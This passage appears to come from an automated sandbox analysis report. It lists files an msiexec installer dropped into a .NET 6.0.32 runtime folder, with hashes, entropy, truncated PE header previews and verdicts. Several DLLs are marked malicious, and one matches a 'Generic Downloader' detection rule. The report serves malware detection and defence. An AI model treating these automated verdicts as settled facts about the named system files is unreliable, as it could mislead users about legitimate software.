                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r............"!..0..............*... ........@.. ....................................`.................................|*..O....@..h................(...`.......)..8............................................ ............... ..H............text........ ...................... ..`.rsrc...h....@......................@..@.reloc.......`......................@..B.................*......H........ ......................P .........................................0v+.....W.....7.,.U.6.?#O.(F@.)2.....v.a.p...X.....&[.:.q.6........<..,A^.w.wU......#..fx....5.-..2..J......6f...=rBSJB............v4.0.30319......`.......#~......\...#Strings....X.......#GUID...h.......#Blob......................3......................................'.........C...............................d...%.{...g.{.....{...|.{.....{.....{.....{...c.{.....{.............................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlDocument.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16152
                                                                                                                                                                                                                                        Entropy (8bit):6.788762477043187
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:6RGxGfj14WA9pnPUWoWhWxNzx95jmHnhWgN7acWyILyttuX01k9z3A1iGHl9CN:ksGfjiWeJsW1KX6HRN7A2SR9zWi49M
                                                                                                                                                                                                                                        MD5:A8C4B4B883ABD397C940CCA54E6BE11E
                                                                                                                                                                                                                                        SHA1:E01F75FC94F7B6A01985A750A65966C0231B8FE8
                                                                                                                                                                                                                                        SHA-256:56CFB3A3DC6876128F9404DA3B80242FADD11B8996D4AF39652BB408A0076451
                                                                                                                                                                                                                                        SHA-512:5E5A0978570ACD51C1DFD41413D15243420119B09AF829449EBDA7BFF688A9F1922B156068B8F88F013830265164677B61FD330EE3E81AFDA29A5774B1AF77D1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q............."!..0..............+... ........@.. ..............................z.....`.................................|+..O....@...................)...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P ........................................^...K=....T..t..R.(Q.'.V.K...<.pR.!G.....c`...c2.CyM..V.xuH...xv3(.IM]7...^r.R.<..q..3w2M.J......j..0..)..!{.1H..Z..7BSJB............v4.0.30319......`.......#~..\.......#Strings....H.......#GUID...X.......#Blob......................3......................................#.........P./...../.........O.............\...2.....g...................................p............./.......................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlSerializer.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18200
                                                                                                                                                                                                                                        Entropy (8bit):6.622578908813458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:1e7gLgTJNTXxhuuWpovWAWGWxNzx95jmHnhWgN7acWAYzyttuX01k9z3A1if37:Q08rBhPWpovWNNX6HRN79SR9zWi/7
                                                                                                                                                                                                                                        MD5:E9B2D64A6720117CE7AA1163D2BF6C70
                                                                                                                                                                                                                                        SHA1:B54E1A857603CB0EE0942BA9361C569EFE407FE3
                                                                                                                                                                                                                                        SHA-256:A26D2CE64BD85D4A33404F896AD6B52C2EA0429DCF87E47C62EFC81828C00B5D
                                                                                                                                                                                                                                        SHA-512:E56E4B8F27D87D6FD96CDCF277A1BF7FC06B37BB9D444050390B0EE401E8A28221077B5B8AE15F8666C04AEEBA957E44BDB2733DF71ED118EB3B269DF6F4D42F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ZG..........."!..0..............3... ........@.. ....................................`..................................2..W....@...................)...`...... 2..8............................................ ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................3......H........ ..P...................P ......................................2......R7..K!..%...].l(% ......K......!....3...X.......6..p$../.'t...n..p/.:..B.|....X.....vly'e...3..=m#.k-E8C.%u....BSJB............v4.0.30319......`.......#~..(...p...#Strings............#GUID...........#Blob......................3................................J.................................+.....F...........N.....H.........................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24848
                                                                                                                                                                                                                                        Entropy (8bit):6.215678969244202
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:DV/Mc95qohA8bhUVGKOudE6WK9jsWSYA6VFHRN7qCKN9R9zmwje7pk:DV0chOpfsFClqCk9zLjUO
                                                                                                                                                                                                                                        MD5:0E9B0C0CBF26962F5E9170E8CBEDB4D8
                                                                                                                                                                                                                                        SHA1:C524BEB25F7F9F4B7421C76E0F93546B239F0F64
                                                                                                                                                                                                                                        SHA-256:A5694C5A91559559BD8510F6906282EB640512C5B76EA2C08A56166181706AE0
                                                                                                                                                                                                                                        SHA-512:7F86D23616637175B695DB604C60B4D6488104E474A6A1E118DEDD3A24722B0CF2190A6FFE509A451073EE68EB99CC0C7557486C1469A35DFE9098795D5CA222
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.6..........." ..0..............L... ...`....... ....................................`..................................K..O....`..8............8...)...........J..T............................................ ............... ..H............text....,... ...................... ..`.rsrc...8....`.......0..............@..@.reloc...............6..............@..B.................K......H.......P ...*..................lJ......................................BSJB............v4.0.30319......l...@...#~..........#Strings....L'......#US.P'......#GUID...`'......#Blob............T.........3..........................................P............... .................k.....H...........S.................G...................................+.....m.S...0...................x.....x.....x...).x...1.x...9.x...A.x...I.x...Q.x...Y.x...a.x...i.x...q.x...y.x.....x. ...x.....x...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50976
                                                                                                                                                                                                                                        Entropy (8bit):5.747340839729143
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:bQuoy1c6A2ZX8TRNH5JVbOd502zq1TntVaO6fWRHDRxw9zbkG:bQuoO3ZX8Q5jzC3azfWtIzIG
                                                                                                                                                                                                                                        MD5:F4AA8DA1F6C1EA181899961A43E94611
                                                                                                                                                                                                                                        SHA1:8B4F2CA7CCD76D8D51710E1ACB9DB77FAECCF76F
                                                                                                                                                                                                                                        SHA-256:6AE23353B15E629F945EB03DE5FA3E14F264518CBA9B3872F98EB23DEBFB6B19
                                                                                                                                                                                                                                        SHA-512:7432D12F9840ED710F6FE68CCFD5FB7321FD93FA4384144336B5F79EB6903CD461261FDDE16D16A7446853FA4BF3EE77114BE201FEB433CFAB069F71590C567A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ..............................4.....`.....................................O....................... ).............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......P ......................`.......................................BSJB............v4.0.30319......l...$;..#~...;...R..#Strings....4.......#US.8.......#GUID...H.......#Blob............T.........3................................/......................=.....=....J=...=......V...}.....h.. ..... ..... ..J.. ..... ..... ..... ..1.. ..j.. .., AF..a.AF.....R..e..=.................;.....;.....;..)..;..1..;..9..;..A..;..I..;..Q..;..Y..;..a..;..i..;..q..;..y..;.....; ....;.....;..

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\WindowsBase.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17168
                                                                                                                                                                                                                                        Entropy (8bit):6.671236708882877
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:gpmduasEWQ9EE6rWVZcW4YA6VFHRN7I2IR9zqIcx:g0dJnxCFClrU9zY
                                                                                                                                                                                                                                        MD5:9C24FB2625D3BE532FE098126BD60FF6
                                                                                                                                                                                                                                        SHA1:336F6676FBB339867B1F147679E825222C0BA51D
                                                                                                                                                                                                                                        SHA-256:3CFF84BE953E9791D90CFAC5B97913DD04D88BEBD5DAB42E650D6C102891B686
                                                                                                                                                                                                                                        SHA-512:E493486CFD2C5AC9206F7FF0EEC2A59FC1051200A576C0E69B067411E51F606D3E2D0D89F4DB8FFB0B8BB79C4A38ABF971AB35D335DC4F5CAF63E27BA37275EE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....d..........." ..0............../... ...@....... ...............................R....`.....................................O....@..8................)...`.......-..T............................................ ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`......................@..B........................H.......P .. ...................p-......................................BSJB............v4.0.30319......l.......#~..$.......#Strings............#US.........#GUID.......D...#Blob............T.........3..........................................f.........3.................'.....0.......v.....................l...........I.....f.....S.............i.....i................. ...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.459775574843526
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:SOQWvhW/WYnO/VWQ4SWc0NsxZAqnajT9CJIC:SjWvhWvUsNs/Al39AL
                                                                                                                                                                                                                                        MD5:681C84FB102B5761477D8DA2D68CD834
                                                                                                                                                                                                                                        SHA1:FD96CF075A956FBC2B74E1ECC3E7958163B58832
                                                                                                                                                                                                                                        SHA-256:F0F7CB2A9FFCCB43400DB88D6BF99F2FCC3161DE1AC96C48501D4D522C48C2CA
                                                                                                                                                                                                                                        SHA-512:C41A62F8D10290215B8A7F0DDCC27A1CF12A7453C2DAABEF75BD2CE87C4FFC87D74EDC8CAA1771BEDA0BFA26249CFE3C94D4AF50B22A5DECB6D282BD8A2C4BDD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...B4............" .........0...............................................@............`A........................................p...,............0...............0...!..............p............................................................................rdata..t...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-2-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20960
                                                                                                                                                                                                                                        Entropy (8bit):4.499619700582879
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:L6WvhWFWYnO/VWQ4SWssAtkqnaj6M07i5CK:+WvhW1UslWMui57
                                                                                                                                                                                                                                        MD5:039D612693E56CCF32AE81C99443EA77
                                                                                                                                                                                                                                        SHA1:0487AA5E7D283A8840F3005D1E24E8C9ED140974
                                                                                                                                                                                                                                        SHA-256:4E978EE035B72032D0B7693E09EED6E112DCED6965780BC3E6B8E024EA2366AB
                                                                                                                                                                                                                                        SHA-512:FFA56C73E977FFCEF7890AB6C3EC52E9827AF28B0552F11C48BB7CA16D37C2B7069FB7E03CEFB89F8679E3755BCC8C47344D0D9B91416C6D92CA7DB28C20240A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....=.........." .........0...............................................@...........`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20952
                                                                                                                                                                                                                                        Entropy (8bit):4.308560743366262
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:1WvhW/WYnO/VWQ4yWxK2fvXqnajeCqN+6:1WvhWvU8XlX0
                                                                                                                                                                                                                                        MD5:2A8065DC6E6E60FB90B4B3F9E6BA7288
                                                                                                                                                                                                                                        SHA1:400A1F44CD4354DEA0117E79EC04B006D6141B36
                                                                                                                                                                                                                                        SHA-256:55E5F10D0DD9C85FF1C6DC7798E46B3A4422FB7EBC583BB00D06A7DF2494397B
                                                                                                                                                                                                                                        SHA-512:787E033E35AA357263639D97FDFE8A2EBC9F17865579BE13C14C0A4C2ED99432ED8EA79C5046D1B4B783BF5FCF7B713EFDD70FCA8445A7AFCB91CFDDC7F9D442
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...FBe..........." .........0...............................................@.......,....`A........................................p................0...............0...!..............p............................................................................rdata..X...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.314779945585029
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:JWvhWiWYnO/VWQ4mWAyTIl1PXEKup3JdqnajKsztG2:JWvhWYUQI/PX7aJdlGsztG2
                                                                                                                                                                                                                                        MD5:720DB2235C4193151FF8987F8A729135
                                                                                                                                                                                                                                        SHA1:038648798892203B506AB4664BAECA25F78BC43C
                                                                                                                                                                                                                                        SHA-256:092B72832C47F9C4EDCDE61F1A111C20EB73452984E0A6109482DE74EB03C34D
                                                                                                                                                                                                                                        SHA-512:CAAC89DC4FE10E7752B6F248623B34A47A77A750E62F0A558C760A8AD672D980AFC966A9E5696BA5C916E722FD221D305C4D2C49D5DDA0E4A768855886D4F3CA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...@4............" .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.363620943088422
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:9m7xeiImxD3exWvhW5WWYnO/VWQ4mWACJXEKup3JdqnajKsztJ30:9m7xeiIFxWvhWuUkX7aJdlGsztd0
                                                                                                                                                                                                                                        MD5:ECDD006AAE56427C3555740F1ABFA8D6
                                                                                                                                                                                                                                        SHA1:7DFAB7AD873544F627B42C7C4981A8700A250BD4
                                                                                                                                                                                                                                        SHA-256:13BC8B3F90DA149030897B8F9F08D71E5D1561E3AE604472A82F58DAB2B103F9
                                                                                                                                                                                                                                        SHA-512:A9B37E36F844796A0FE53A60684BE51AB4013750BB0B8460C261D25FA5F3DE6CE3380044DDC71116825D130A724DF4BA351C2CFFCBF497EF1B6C443545E83F1C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......v.........." .........0...............................................@.......p....`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-fibers-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.2939305898439235
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:8gWvhWliWYnO/VWQ4mWCkJZH2vArqnajKsbTYjtZ:NWvhWlYUDuH24rlGsbTY5Z
                                                                                                                                                                                                                                        MD5:EB065ED1B5CABDBB90E2403B8564778F
                                                                                                                                                                                                                                        SHA1:5B511215EE0E347734FB727FAD6A0A959FF81BF1
                                                                                                                                                                                                                                        SHA-256:BB2D740333AFAEA2A73A163F95FA102D018CCD68DEF28B6815A2BE0696AB57DB
                                                                                                                                                                                                                                        SHA-512:E5FF38F28253FB31BF583131E23EF58AF60020AD1FB329986C8789FE351F4B73CB06109FBC4220678D93191B04DB353466F728534AA1FEBEDF150C491B8E7C65
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....cc.........." .........0...............................................@.......o....`A........................................p................0...............0...!..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25048
                                                                                                                                                                                                                                        Entropy (8bit):4.628757275210407
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:1mtaNYPvVX8rFTsvWvhWmWYnO/VWQ4yW9AfvXqnajeCqKW:8PvVXhWvhWMU7XlX7W
                                                                                                                                                                                                                                        MD5:36277B52C64CC66216751AAD135528F9
                                                                                                                                                                                                                                        SHA1:F2A6740BA149A83E4E58E1E331429FA3EB44FBA0
                                                                                                                                                                                                                                        SHA-256:F353B6C2DF7AADB457263A02BCE59C44BBAB55F98AE6509674CFBC3751F761B9
                                                                                                                                                                                                                                        SHA-512:BE729194A0A3C4D70A6FFA8DE5C7F8BB3DDA1F54772F9AEFF4B9AA1D6756720D149613C5DCB911286B6C0181A264A4A2A8A4EB848C09AC30BA60B6FD10DD64C9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...!..e.........." .........@...............................................P............`A........................................p................@...............@...!..............p............................................................................rdata..L........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20960
                                                                                                                                                                                                                                        Entropy (8bit):4.328858083322922
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:IAIEWvhWLIQWYnO/VWQ4eWletp80Hy5qnajsBk9:I5EWvhWLI+UJpslE8
                                                                                                                                                                                                                                        MD5:D92E6A007FC22A1E218552EBFB65DA93
                                                                                                                                                                                                                                        SHA1:3C9909332E94F7B7386664A90F52730F4027A75A
                                                                                                                                                                                                                                        SHA-256:03BD3217EAE0EF68521B39556E7491292DB540F615DA873DD8DA538693B81862
                                                                                                                                                                                                                                        SHA-512:B8B0E6052E68C08E558E72C168E4FF318B1907C4DC5FC1CD1104F5CAE7CC418293013DABBB30C835A5C35A456E1CB22CC352B7AE40F82B9B7311BB7419D854C7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................" .........0...............................................@......p.....`A........................................p...L............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20960
                                                                                                                                                                                                                                        Entropy (8bit):4.41968362445382
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:lC+WvhWRWYnO/VWQ4SWHvD480Hy5qnajsBkffy2:4+WvhWRUGEslECl
                                                                                                                                                                                                                                        MD5:50ABF0A7EE67F00F247BADA185A7661C
                                                                                                                                                                                                                                        SHA1:0CDDAC9AC4DB3BF10A11D4B79085EF9CB3FB84A1
                                                                                                                                                                                                                                        SHA-256:F957A4C261506484B53534A9BE8931C02EC1A349B3F431A858F8215CECFEC3F7
                                                                                                                                                                                                                                        SHA-512:C2694BB5D103BAFF1264926A04D2F0FE156B8815A23C3748412A81CC307B71A9236A0E974B5549321014065E393D10228A0F0004DF9BA677F03B5D244A64B528
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....mR.........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.329081455517674
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ZfWvhWPWYnO/VWQ4SWR7me4qdsxZAqnajT9CRixc:ZfWvhW/UNezs/Al39wiO
                                                                                                                                                                                                                                        MD5:3039A2F694D26E754F77AECFFDA9ACE4
                                                                                                                                                                                                                                        SHA1:4F240C6133D491A4979D90AFA46C11608372917F
                                                                                                                                                                                                                                        SHA-256:625667EA50B2BD0BAE1D6EB3C7E732E9E3A0DEA21B2F9EAC3A94C71C5E57F537
                                                                                                                                                                                                                                        SHA-512:D2C2A38F3E779AC84593772E11AE70FC8BCFD805903E6010FE37D400B98E37746D4D00555233D36529C53DD80B1DF923714530853A69AA695A493EC548D24598
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......0.........." .........0...............................................@......=.....`A........................................p...`............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20960
                                                                                                                                                                                                                                        Entropy (8bit):4.447714045651854
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:gxlAWvhW5EWYnO/VWQ4SWArSZBUuUgxfzfqnajmGYjB:gxlAWvhW5yUbSsIrlStjB
                                                                                                                                                                                                                                        MD5:2EDC82C3DA339A4A138B4E84DC11E580
                                                                                                                                                                                                                                        SHA1:E88F876C9E36D890398630E1B30878AF92DF5B59
                                                                                                                                                                                                                                        SHA-256:E36B72EAFFFFFB09B3F3A615678A72D561B9469A09F3B4891ABA9D809DA937A5
                                                                                                                                                                                                                                        SHA-512:6C1B195B2FABE4D233724133AE3BDF883F287B5ECD9639A838AD558159A07E307E7AE5E5407CE9229DCCDE4BE2CC39EC59506A5FB73B45D04B80330B55E2B85C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...)\Ix.........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
